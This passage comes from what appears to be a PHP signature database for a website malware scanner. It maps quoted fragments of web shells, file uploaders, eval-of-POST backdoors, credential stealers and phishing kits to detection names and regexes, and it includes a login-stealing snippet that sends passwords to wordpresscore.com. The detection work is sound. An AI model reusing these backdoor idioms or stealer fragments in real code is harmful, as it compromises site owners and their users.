		'if (mail($_POST[\'to\'], $_POST[\'subject\'], $_POST[\'message\'], $_POST[\'headers\'])) {echo \'ok\';}' => array(STR_CLEAR_MULTIMATCH, 'php.mailer.generic.035', 'if\s*\(\s*\(\s*isset\(\$_POST\[.to.\]\s*\)\s*\)\s*AND\s*\(\s*isset\(\$_POST\[.subject.\]\s*\)\s*\)\s*AND\s*\(isset\(\$_POST\[.message.\]\s*\)\s*\)\s*AND\s*\(isset\(\$_POST\[.headers.\]\s*\)\s*\)\s*\)\s*{\s*if\s*\(mail\(\$_POST\[.to.\],\s*\$_POST\[.subject.\],\s*\$_POST\[.message.\],\s*\$_POST\[.headers.\]\s*\)\s*\)\s*{echo\s*.ok.\s*;\s*}\s*}\s*else\s*{\s*header\(.Location:\s*\/.\)\s*;\s*}'),
		'<meta charset="utf-8"><form action="?act=save" method="post">content' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_gen.014', 'if\(\s*\@\s*\$_GET\[.\w+.\]\s*=+\s*.\w+.\s*\)\s*{\s*if\s*\(isset\s*\(\s*\$_POST\[[^{]+{\s*if\s*\(\s*\$_POST\[[^{]+{\s*if\s*\(\s*fwrite\s*\(\s*fopen\s*\(\s*stripslashes\s*\(\$_POST[^{]+{\s*echo\s*.OK.[^{]+{\s*if\s*\(\s*\@\s*\$_GET\[[^{]+{\s*echo[^\2]+form\s*action=.\?act=save.\s*method=.[Pp][Oo][Ss][Tt][^}]+}\s*}'),
		'){echo "200"; exit;} if(isset($_POST[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.105', NULL),
		'echo "<a href=$usrfile> $usrfile </a>";' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.026', NULL),
		'preg_replace("/./\x65",@$_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.125', 'if[\s]*\(isset\(\$_POST\[[^\]]+\]\)\)[\s]*\{[\s]*preg_replace\(.\/.\/\\\\x65.,[\s]*@\$_POST[^;]+\);[\s]*\}'),
		'document.cookie = "stuff=data";' => array(STR_CLEARFILE, 'php.malware.redirect.020', NULL),
		'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*echo[^\{]+\{[\s]*if[\s]*\([\s]*copy[\s]*\(\$_FILES\[.[\w]+.\]\[.[\w]+.\][\s]*,[\s]*\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*echo\(' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.035', 'if[\s]*\([\s]*isset[\s]*\(\$_GET\[.[\w]+.\]\)[\s]*\)[\s]*\{[\s]*echo[\s]*\(.<form[^\)]+form>.\);[\s]*if\(isset\(\$_FILES\[.[\w]+.\]\)[\s]*and[\s]*isset\(\$_POST\[.[\w]+.\]\)\)[\s]*\{[\s]*if\(copy\(\$_FILES\[.[\w]+.\][^\}]+\]\);[\s]*\}[\s]*else[\s]*\{[\s]*echo\(.[^\}]+\);[\s]*\}[\s]*\}[\s]*\}'),
		'symlink\(.\/home\/.\.\$[\w]+\..\/public_html[^\)]+\);' => array(REX_CLEARFILE, 'php.hacktool.configuration_stealer.020', NULL),
	),

	'$_FILES['=> array(STR_TRIGGER,

		'Uploader</title>' => array(STR_TRIGGER,
			'<b>GAGAL' => array(STR_CLEARFILE, 'php.backdoor.uploader.273', NULL),
		),

		'UploadFile($_FILES[' => array(STR_TRIGGER,
			'is_uploaded_file($' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.050', NULL),
		),

		'up){if(@copy($' => array(STR_TRIGGER,
			'php_uname()' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.055', NULL),
		),

		'ORM ENCTYPE="multipart/form-data" METHOD="POST"' => array(STR_TRIGGER,
			'$contents=@fread($' => array(STR_CLEARFILE, 'php.backdoor.uploader.123', NULL),
		),

		'= file_get_contents( \'/etc/passwd\' );' => array(STR_CLEARFILE, 'php.hacktool.local_root_exploit.001', NULL),
		'>Extract Emails From [ OpenCart - WordPress - Joomla - WHMCS' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.014', NULL),
		'else { echo \'#0~\'; }' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.023', NULL),
		'if($_POST["v"]==uploadwoi){if(@copy($_FILES' => array(STR_CLEARFILE, 'php.backdoor.uploader.305', NULL),
		'ploader</title></head><body><center><form action=' => array(STR_CLEARFILE, 'php.backdoor.uploader.370', NULL),
		'<b>go suce.!</b><' => array(STR_CLEARFILE, 'php.backdoor.uploader.399', NULL),
	),

	'wordpresscore.com' => array(STR_TRIGGER,

		'\'u\'=>esc_attr(wp_unslash($_POST[\'log\'])),' => array(STR_TRIGGER,
			'if(isset($_POST[\'log\']) && !empty($_POST[\'log\']))' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.005.02', 'if.isset.._POST..log.\]\) .. \!empty.._POST..log.\]\)\)\s*\{[^\}]+\$postdata = http_build_query[^\}]+esc_attr.wp_unslash.._POST..pwd[^\}]+wordpresscore.com\/[^\}]+\}' ),
			'if($redirect_to == \'wp-admin/\'' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.005', 'if..redirect_to == .wp-admin\/. \|\| .redirect_to == admin_url[\W]+?\{\s*\$postdata = http_build_query[^\}]+esc_attr.wp_unslash.._POST..pwd[^\}]+wordpresscore.com\/[^\}]+\}' ),
		),

		'$url = "http://wordpresscore.com/plugins/' => array(STR_CLEARFILE, 'php.backdoor.wordpresscore.001', NULL),
		'//****Start****/' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.004', '\/\/\*{4}Start\*{4}\/\s*if\s*\(\s*isset.._POST..\w+.[\]\)\s]+\{[^\}]+\$postdata = http_build_query[^\}]+file_get_contents..http:..wordpresscore.com[^\}]+\}'),
	),

	'$handle = fopen($file' => array(STR_TRIGGER, 

		'ini_set(\'display_errors\',' => array(STR_TRIGGER,
			'echo "ok";' => array(STR_TRIGGER,
				
				'if($id == 0)' => array(STR_TRIGGER,
					'@$id = $_GET["id"];' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.403.02', '@\$id = \$_GET\["id"\];[\s]*if.strlen\(.id\)[\s]*!=[\s]*0\)[\s]*\{[\s]*[^\}]+\}[\s]*ini_set\(.display_errors.,[\s]*..ff.\);[^\}]+\}[\s]*\$handle[^\}]+\}[\s]*fclose[^\*]+exit\(\);[\s]*\}'),
				),

				'@$filename = $_POST[\'filename\'];' => array(STR_CLEARFILE, 'php.backdoor.uploader.403', NULL),
			),
		),

		'$hajar = $_POST[' => array(STR_CLEARFILE,'php.backdoor.uploader_POST.005', NULL),
	),

	'ANONISMA' => array(STR_TRIGGER,

		'md5(gmdate' => array(STR_TRIGGER,
			'<div class=\"a-n-o-n-i-s-m-a\" id=\"' => array(STR_CLEARFILE, 'php.phishing.anonisma_free_tools.002', NULL),
			'<form action=\"./account/successfully.php?id="' => array(STR_CLEARFILE, 'php.phishing.anonisma_free_tools.003', NULL),
		),

		'ANONISMA FREE TOOLS' => array(STR_CLEARFILE, 'php.phishing.anonisma_free_tools.001', NULL),
	),

	'@chmod($_POST' => array(STR_TRIGGER,

		'r57' => array(STR_TRIGGER,
			'if(($_POST[\'cmd\']' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.002', NULL),
		),

		'$v2045f746 = array("Google"' => array(STR_CLEARFILE,'php.backdoor.webshell_gen.054',NULL),
	),

	'sprintf($' => array(STR_TRIGGER,

		'!preg_match("/\/$/si",' => array(STR_TRIGGER,
			'$map_index = "{$dir}sitemap_index.xml' => array(STR_CLEARFILE, 'php.spam-seo.sitemap_doorway.002', NULL),
		),

		'<?php sprintf($_POST[pass]) ?>' => array(STR_CLEARLINE, 'php.backdoor.fakeGIF.001', '<?php sprintf($_POST[pass]) ?>'),
	),

	'register_tick' => array(STR_TRIGGER,
		'declare(ticks=1); @register_tick_function($ {\'_POST\'}/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.register_tick.001', 'declare\(ticks=\d+\);\s*@register_tick_function\(\$\s*{._POST.}.\*\w+\*.{.\*\w+\*.\w+.\*\w+\*.},\${\s*._POST.}\s*{\s*@.\w+.}.\*\w+\*.\)\s*\;'),
		'; @register_tick_function(${"_POST"}{' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.register_tick.001.02', 'declare\(ticks=\d+\).\*\w+\*.\;\s*@register\_tick\_function\(\${._POST.}\s*{.\w+.}\,@\${\s*._POST.\s*}{\s*.\w+.\s*}\s*\)\;'),
	),

	'\'/ad/e\'' => array(STR_TRIGGER,
		'\'@\'' => array(STR_TRIGGER,
			'\'add\'' => array(STR_TRIGGER,
				'@preg_replace' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.056', '(?:if\(isset\(\$_GET\[.test.\]\)\)\{echo .success.;\}else\{isset\(\$_POST[^\&]+\&\& +)?\([\s]*\$[\w]+[\s]*=[\s]*\$_POST[\s]*\[[\s]*.[\w]+.[\s]*\][\s]*\)[\s]*&&[\s]*@preg_replace[\s]*\([\s]*..ad.e.[\s]*,[\s]*.@[^;]+add.[\s]*\)[\s]*;'),
			),
		),
	),

	']);die();' => array(STR_TRIGGER,
		'if(sha1($p[' => array(STR_TRIGGER,
			'p=$_POST;if(isset($p[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.056', 'function [\\w]+\\(\\)\\{[\\s]*\\$p=\\$_POST;if.isset.\\$p\\[[^\\)]+\\)\\)[\\s]*if.sha1.\\$[^{]+\\{[\\s]*\\$[^;]+;die\\(\\);[\\s]*}[\\s]*}'),
		),
	),

	'<Limit GET POST>' => array(STR_TRIGGER,
		'deny from' => array(STR_TRIGGER,
			'## USER IP BANNING' => array(STR_CLEAR_MULTIMATCH, 'htaccess.phishing.deny-users.001', '## USER IP BANNING[\s]*<Limit GET POST>[\s]*order allow,deny[^>]+<.Limit>'),
		),
	), 

	'(url, dataobject, ok, err, timeout=' => array(STR_TRIGGER,
		'const new_cook = !document.referrer || document.referrer.includes(location.host)' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.100', NULL),
	),

	'$pass=explode("\';",$pass[1]);' => array(STR_TRIGGER,
		'or ("../../config/settings.inc.php") or ("../../../config/settings.inc.php' => array(STR_CLEARFILE, 'php.hacktool.cms_credentials_stealer.005', NULL),
	),

	'/index.php?option=com_myblog&task=ajaxupload");' => array(STR_TRIGGER,
		'.php.jpg' => array(STR_CLEARFILE, "php.hacktool.com_myblog_exploit.001", NULL),
	),

	'if ($pw !== $PASSWORD) {' => array(STR_TRIGGER,
		'.DB_NAME."`.`wp_pbn` ' => array(STR_CLEARFILE, 'php.hacktool.wp_pbn.001', NULL),
	),

	'function do_post_request($url, $data, $optional_headers' => array(STR_TRIGGER,
		'$p = getRandChar($pcount);' =>array(STR_CLEARFILE, 'php.hacktool.post_request.001', NULL),
	),

	'array(\'Filedata\'=>"@$uploadfile"));' => array(STR_TRIGGER,
		'upload_settings_image.php")' => array(STR_CLEARFILE, 'php.hacktool.upload_settings_image_exploit.001', NULL),
	),

	'Welcome</title>' => array(STR_TRIGGER,
		'"Please enter your PayPal User ID"' => array(STR_CLEARFILE, 'html.phishing.paypal.017', NULL),
	),

	'error_reporting' => array(STR_TRIGGER,
		'$cmd = $_POST[\'cmd\'];' => array(STR_CLEARFILE, 'php.backdoor.uploader.032', NULL),
	),

	'$wp_nonce);if(isset($wpautop' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.058', NULL),
	'$_POST["pwd"]="Weak Liver";' => array(STR_CLEARFILE, 'php.backdoor.generic.031', NULL),
	'$allsites_home."</homepath><addiction>".$addiction_dir."</addiction></data>";' => array(STR_CLEARFILE, 'php.backdoor.filesman.004', NULL),
	'$_=@((base64_decode($_POST[' => array(STR_CLEARFILE,'php.backdoor.eval_POST.014', NULL),
	'$x0b=$_POST["inp"];' => array(STR_CLEARFILE,'php.backdoor.eval_POST.015', NULL),
	'$code = @fread(@fopen($HTTP_POST_FILES["f"]' => array(STR_CLEARFILE, 'php.backdoor.HTTP_POST_FILES.001',NULL),
	'array(\'qqfile\'=>"@$uploadfile"));' => array(STR_CLEARFILE, 'php.hacktool.shell-uploader.002', NULL),
	'$dir = getDir(getcwd()."/db/");' => array(STR_CLEARFILE, 'php.malware.injector.020', NULL),
	'<input name="todir" type="text" id="todir" value="__dodo__" size="15">' => array(STR_CLEARFILE, 'php.backdoor.dodo_zip.001.02', NULL),
	'$parts = explode(\'|\', $var_b($_POST[\'data\']));' => array(STR_CLEARFILE, 'php.backdoor.zip_uploader.001', NULL),
	'preg_match_all(\'#<h2 class="sb_h3 cttl"><a href="(https?' => array(STR_CLEARFILE, 'php.hacktool.bing_dork.001', NULL),
	'strripos(@sha1($shall),' => array(STR_CLEARFILE, 'php.backdoor.gandalf.001',  NULL),
	'$relink_mas[$relink_n].' =>  array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.012',  NULL),
	'@$thor($hamm);' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.007', NULL),
	'if(!strpos($JOKER7' => array(STR_CLEARFILE, 'php.mailer.POST.011', NULL),
	'<title>WordPress Mass Password Changer |' => array(STR_CLEARFILE, 'php.hacktool.wp_mass_passw_changer.001', NULL),
	'<? $x="a"."ss"."er"."t"; $x($_POST["' => array(STR_CLEARFILE, 'php.backdoor.assert.002', NULL),
	'@array_map(\'a\'.\'s\'.\'s\'.\'e\'.\'r\'.\'t\',array($_POST' => array(STR_CLEARFILE,'php.backdoor.assert.003', NULL),
	'if($_POST[\'hsh\']==\'' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.034', 'if\(\$_POST..hsh..==.\w+[^\}]+c.._POST..z[^\}]+;\}'),
	'$_POST; @($p[0] != $p[1]) ? @$p[2]($p[3])' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.038', '\$p = \$_POST; \@\(\$p\[0\] != \$p\[1\]\) \? \@\$p\[2\]\(\$p\[3\]\) : \(int\)\$p;'),
	'|Data Of berithday = <b><font color=\'green\'>$DOB' => array(STR_CLEARFILE, 'php.phishing.redirect.014', NULL),
	'])&($config=chr(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.048', '\\(\\$config=@\\$_GET.[\\d]+.\\)&\\(\\$config=chr[^&]+&\\$config.._POST.[\\d]+.\\)'),
	'type: "POST", url: "hello.php", data: { "email" : the_email , "password" : the_password }, success: function(data)' => array(STR_CLEARFILE, 'js.phishing.generic.005', NULL), 
	'fwrite($hellowp,$username_password,$time);' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.cms_credentials_stealer.012', '\$username_password[\s]*=\$_POST\[.log.\][\s]*\.[^;]+;[\s]*\$hello[^;]+;[\s]*\$[\w]+[\s]*=[\s]*fwrite\(\$hellowp[^;]+\);'),
	'<title>Wordpress Mass Change Password</title>' => array(STR_CLEARFILE, 'php.hacktool.wp_mass_passw_changer.002', NULL),
	'DNThirTeen' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.013', NULL),
),

'base64_decod' => array(STR_TRIGGER,

	'echo' => array(STR_TRIGGER,

		'echo base64' => array(STR_TRIGGER,

			'PGRpd' => array(STR_TRIGGER,
	
				'$this->item->hits' => array(STR_CHAIN_TRIGGER,
		
					'($cont!=' => array(STR_TRIGGER,
						'if ($cont!=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.143.02', 'if\s*\(\$cont[!=]{1,}.1.[^\{]+\{\s*\$\w+\s*=\s*.PGRpdi[^;]+;\}(\s*echo\s*base64_decode\([^;]+;)?'),
					),
	
					'PGRpd[^;]*[\'"][\s]*.[\s]*[\'"]' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.injector.143', 'if[\s]*\([\s]*\$this->item->hits >[^{]+\{[\s]*\$[\w]+[^;]+.PGRpd[^}]+\}'),
					'php echo base64_decode' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.143.04', 'echo base64_decode\([\s]*\$[\w]+[\s]*\);'),
				),
	
				'PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOy' => array(STR_TRIGGER,
	
					'add_filter(' => array(STR_TRIGGER,
						'function [\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.PGRpdi' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.iframer.002.02', 'if[\s]*\(!function_exists\(.([\w]+).\)\)[\s]*\{[\s]*add_filter\([\s]*.[\w]+.,[\s]*.\1.\);[\s]*function \1\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.PGRpd[^;]+;[\s]*(if[\s]*\(is_[^\{]+\{[\s]*)?[\s]*echo base64_decode\([^;]+\);[\s\}]+'),
					),
	
					'PGRpdiBzdHlsZT0icG9zaXRpb24' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.iframer.002', '\$[\w]+[\s]*=[\s]*.[^;]{0,200}PGRpdi[^;]+;[\s]*echo base64_decode\(\$[\w]+\);'), 
				),

				'[\'"]PGRpd[^;]+;[\s]*echo[\s]*base64_decode' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.143.03', '(\$\w+)\s*=\s*.PGRpdiB[^;]+;\}?\s*echo\s*base64_decode\(\1\);'),
			),

			'PHNjcmlw' => array(STR_TRIGGER,
				'echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2p' => array(STR_CLEAR_LINEMATCH, 'php.malware.visitor_tracker_052F.001', '(<\!--\w{28,}-->\s*<.php )?(\/\*\w{28,}\*\/\s*)?.ob_start..;\s*.ini_set..display_errors.,0.;[^;]+?;\s*echo base64_decode..PHNjcmlwdCB0eX[^\)]+\);(\s*\/\*\w{28,}\*\/)?(\s*\?>\s*<\!--\w{28,}-->)?'), 
				'echo base64_decode("PHNjcmlwdD4=").' => array(STR_CLEAR_LINEMATCH, 'php.malware.jquery_min_php.001', '(?:\/\* ready: \*\/ )?error_reporting.0.;(\$\w+) = base64_decode\([^\)]+\);(\$\w+) = base64[^&>]+&+[^&>]+&utm_[^\@>]+\@\w+\(\1,\2\);\}(?: \/\* :ready \*\/)?'),
				'echo base64_decode\(.PHNjcmlw' => array(REX_CLEAR_MULTIMATCH,'rex.malware.generic.022','echo base64_decode..PHNjcmlw[^;]+;'),
				'echo base64_decode($this->data)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.base64.030', 'class\s*(\w+)\s*{\s*public\s*\$(\w+)\s*=\s*[\'"][^;]+;\s*public\s*function\s*\w+\(\)\s*{\s*echo\s*base64_decode\(\$this->\2\)\s*;\s*}\s*}\s*\$\w+\s*=\s*new\s*\1\(\)\s*;'),
				'> <?php if ((is_front_page())) { echo base64_decode($' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.031', '<\?php\s*(\$\w+)\s*=\s*[\'"]PHNjcmlw[^;]+;\s*\?>\s*<div\s*style\s*=\s*[\'"]\s*display:none[^>]+>\s*<\?php\s*if\s*\(\(is_front_page\(\)\)\)\s*{\s*echo\s*base64_decode\(\s*\1\s*\)\s*;\s*}\s*\?>\s*<\/div>'),
				'public static function' => array(STR_CLEAR_MULTIMATCH, 'php.malware.base64.035', 'class\s*(\w+)\s*{\s*public\s*static\s*function\s*(\w+)\(\)\s*{\s*ini_set\([^;]+;\s*error_reporting\([^;]+;\s*}\s*}\s*\1::\2\(\)\s*;\s*class\s*(\w+)\s*{\s*public\s*static\s*(\$\w+)\s*=\s*[\'"]PHNjcmlwdD4[^;]+;\s*public\s*function\s*(\w+)\(\)\s*{\s*echo\s*base64_decode\(\3::\4\)\s*;\s*}\s*}\s*\$\w+\s*=\s*new\s*\3\(\)\s*;'),
			),

			'&& md5($_GET[' => array(STR_TRIGGER,

				'if(isset($_REQUEST[chr(' => array(STR_TRIGGER,
					'@include\(\$[\w]+\);[\s]*@unlink\(\$[\w]+\);[\s]*die\(\);[\s]*\}[\s]*else[\s]*\{[\s]*echo[\s]*base64_decode' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.066', 'if\(isset\(\$_GET\[[^\]]+\]\)[\s]*&&[\s]*md5\(\$_GET\[[^\]]+\]\)[^\{]+\{[\s]*if\(isset\(\$_REQUEST\[chr[^\}]+\}[\s]*else[\s]*\{[\s]*echo base64_decode[^\}]+[\s\}]+'),
				),

				'isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.create_function.018', 'if\(isset\(\$_[\w]+\[chr\([\d]+\).chr\([^&]+&&[\s]*md5\(\$_[\w]+\[chr\([\d]+\).[^\}]+\}[\s]+[^&]+&&[\s]+md5\(\$_GET[^@]+@\$_POST\[\$[\w]+\];if\([\d]+<mt_rand\([^@]+@pack\(_[\d]+\([^\}]+\}\}else\{echo[\s]*base64_decode\([^\)]+\);\}die\(\);\}'),
			),

			'$str = <<<EOD' => array(STR_TRIGGER,
				'unlink( MyFileName() );' => array(STR_CLEARFILE, 'php.malware.generic.059', NULL),
			),

			'ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKCRfR0VUWydxJ109PScxJyl7ZWNobyAnMjAw' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.119', '\$[\w]+[\s]*=[\s]*.ZXJyb3Jfc[^;]+SkpOyAK.;[\s]*echo[\s]*base64_decode\(\$[\w]+\);'),
			'PGEgaHJlZj0iaHR0cDovL2phdmhpZGUuY29tIiBzdHlsZT0icG9zaX' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.246', '(\$\w+)\s*=\s*["\']PGEgaHJlZj0iaHR0cDovL2phdmhpZGUuY29tIiBzdHlsZ[^"\']+\';\s*echo\s*base64_decode\((\$\w+)\);'),
			'PGEgaHJlZj0iaHR0cDovL3NleHN1dC5jb20iIHN0e' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.235', '(\$\w+)\s*=\s*.PGEgaHJlZj0iaHR0cDovL3NleHN1dC5jb20iIHN0e[^\']+\';\s*echo\s*base64_decode\(\1\)\;'),
			'strtolower\(\$_SERVER\["HTTP_USER_AGENT"\]\)\)\)\{[\s]*echo base64_decode' => array(REX_CLEAR_LINEMATCH, 'rex.spam-seo.pharmaspam.001', 'if\(\(strtolower\(\$\_SERVER\[.REQUEST\_URI.\]\)[\s]*\=\=[\s]*[^#]+#googlebot\|[^\{]+\$_SERVER\[.HTTP_USER_AGENT.]\)\)\)\{[\s]*echo[\s]*base64_decode\([^)]+[\W]\);[\s]*\}'),
			'SUdsbUlDaGpiM1Z1ZENna1' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.generic.040', 'echo\s*base64_decode\(.SUdsbUlDaGpiM1Z1ZENna1\w+W9KR1IyY3lrc0RRb2dJQ0FnSUN\w+5MQ1JmWVhKeVlYa3BPdzBLSUNBZ0lIMD0=.\);'),
			'base64_decode($lpc)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.091', '\$lpc=.PG[^;\?]+;\s*echo base64_decode..lpc.;'),
			'echo base64_decode("77u/PHAgc3R5bGU9InBvc2l0aW9uOm' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.118', 'if.strstr.._SERVER..HTTP_USER_AGENT..,.Googlebot..\)\s*\{\s*echo base64_decode..77u.PHA[^\'"]+["\']\);\s*\}'),
			'visitorTracker*/@ob_start();@ini_set("display_errors",0);' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.visitor_tracker.001', '..visitorTracker...ob_start..;.ini_set..display_errors.,0.;.error_reporting.0.;echo base64_decode.[^;]+;..visitorTracker..'),
			'<!--visitorTracker--><?php @ob_start();@ini_set("display_errors",0);' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.visitor_tracker.001.03', '<!--visitorTracker--><.php .ob_start..;.ini_set..display_errors.,0.;.error_reporting.0.;echo base64_decode.[^;]+;.><!--visitorTracker-->'),
			'echo base64_decode("bGFkeWdhZ2F5");' => array(STR_CLEARFILE, 'php.malware.component.011', NULL),
			'LXNpemU6MjRweDtmb250LXdlaWdodDpib2xkIj5QbGVhc2Ugc2VsZWN0IFlvdXIgU0hPUCE8L3A+PC9jYXB0' => array(STR_CLEARFILE, 'php.spam-seo.backlinks.002', NULL),
			'PCFET0NUWVBFIEhUTUw+DQo8aHRtbD4NCiAgICA8aGVhZD4N' => array(STR_CLEARFILE, 'php.spam-seo.redirect.113', NULL),
			'===base64_decode(\'cGluZw==\'))exit(base64_decode(\'b2s=\'));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.321', 'if\(\$_SERVER\[base64_decode\([^;]+b2s=.\)[^\n]+exit\(\);\}'),
			'PGh0bWw+DQoNCg0KPGltZyB1c2VtYXA9IiN' => array(STR_CLEARFILE, 'php.spam-seo.injection.101', NULL),
			'PGlmcmFtZSBzcmM9Imh0dHBz' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.103', '\$([\w]+)[\s]*=[\s]*.PGlmcmFtZSB[^;]+;[\s]*echo[\s]*base64_decode\(\$(\1)\);'),
			'base64_decode(\'LmNvb2tpZQ==' => array(STR_CLEARFILE, 'php.phishing.netflix.009', NULL),
			'cHJlc3MtcmVzcG9uc2l2ZS1mcmVlLyI+UmVzcG9uc2l2ZSB' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.249', 'if[\s]*\(!function_exists\(.([\w]+).\)\)[\s]*\{[\s]*add_filter\([^,]+,[\s]*.\1.[\s]*\);[\s]*function[\s]*\1\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*if\(is_front_page\(\)[\s]*or[^}]+echo base64_decode\([^;]+;\}+'),
			'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.249.02', '<\?php[\s]*\$[\w]+[\s]*=[\s]*.PHNjcm[^;]+;[\s]*\?>[\s]*<div style[^>]+>[\s]*<\?php if[\s]*\([\s]*\([\s]*is_front_page[^\}]+echo base64_decode[^\}]+\}[\s]*\?>[\s]*<.div>'),
		),

		'($i){$a=Array(\'' => array(STR_TRIGGER,

			'<title><?php echo $_SERVER[' => array(STR_TRIGGER,
				'function l__' => array(STR_CLEARFILE, 'php.backdoor.webshell.203', NULL),
			),

			'\');return base64_decode($a[$i]);} ?><?php echo' => array(STR_CLEAR_MULTIMATCH, 'php.malware.onclickads_net.001', 'function (\w+)\(\$i\)\{\$a=Array\(\'\w+[^\);]+\);return base64_decode.\$a.\$i\]\);\} .><.php echo \1\(0\);'),
			'<\?php \$GLOBALS\[[^\]]+\][\s]*=[\s]*Array\([^\)]+\);[\s]*\?>[\s]*<\?php[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*Array[^\)]+\);[\s]*return base64_decode\(\$.\[\$.\]\);\}[\s]*\?>' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.injector.330', '<\?php \$GLOBALS\[[^\]]+\][\s]*=[\s]*Array\([^\)]+\);[\s]*\?>[\s]*<\?php[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*Array[^\)]+\);[\s]*return base64_decode\(\$.\[\$.\]\);\}[\s]*\?>[^\n]+break;[\s\}]*\?>'),
			'NULL;do{curl_multi_exec($' => array(STR_CLEARFILE, 'php.backdoor.curl.029', NULL),
		),

		'Visbot' => array(STR_TRIGGER,
			'base64_decode(\'PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJ' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.018', NULL),
		),

		'$SETTS = unserialize(@file_get_contents(SETTINGS_FILE' => array(STR_TRIGGER,
			'function show_bad_js(){' => array(STR_CLEARFILE, 'php.spam-seo.visitor_tracker.001.02', NULL),
		),

		'$linker = str_replace(\'<replace>\', $param, $linker' => array(STR_TRIGGER, 
			'$linker = base64_decode("' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.modx-injector.001', 'if \\(\\$_SERVER..HTTP_REFERER[\'\"]..?!=...?\\).\\{[\\s]*\\$linker = base64_decode.\"[^;]+;[\\s]*\\$param = str_replace[^;]+;[\\s]*\\$link[^}]+\\}[\\s]*echo \\$this->modx->resource->_output;'), // YT - added new variation under the same signature - spaces in the code
		),

		'<? echo(stripslashes(base64_decode(\'' => array(STR_TRIGGER,
			'exit; ?>' => array(STR_CLEAR_MULTIMATCH, 'php.defaced.encrypted.001', '<\? echo\(stripslashes\(base64_decode\(\'[^;]+?;\s*exit; \?>'),
		),

		'CURLOPT_URL, base64_decode("' => array(STR_TRIGGER,
			'echo $wp_post_get_pwdcontent;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.pornspam.005', '\\$wp_post_get_pwdurl = curl_init\\(\\);[\\s]*curl_setop[^;]+CURLOPT_URL, base64_decode[^>]+echo \\$wp_post_get_pwdcontent;'),
		),

		']),$outbuf);foreach($outbuf as $val) $outstr.=$val.chr' => array(STR_TRIGGER,
			';exec(base64_decode($_COOKIE[' => array(STR_CLEARFILE, 'php.backdoor.webshell.072', NULL),
		),

		'{\')||strstr($' => array(STR_TRIGGER,
			'preg_match_all(\'/[<][?]php[\s\S]*?[?]>/i\',' => array(STR_CLEARFILE, 'php.backdoor.uploader.378', NULL),
		),

		'shell-path:' => array(STR_CLEARFILE, 'php.malware.dropper.006', NULL),
		'attachment; filename=".$_SERVER["HTTP_HOST"].".exe");' => array(STR_CLEARFILE, 'php.malware.win32_trojan.001', NULL),
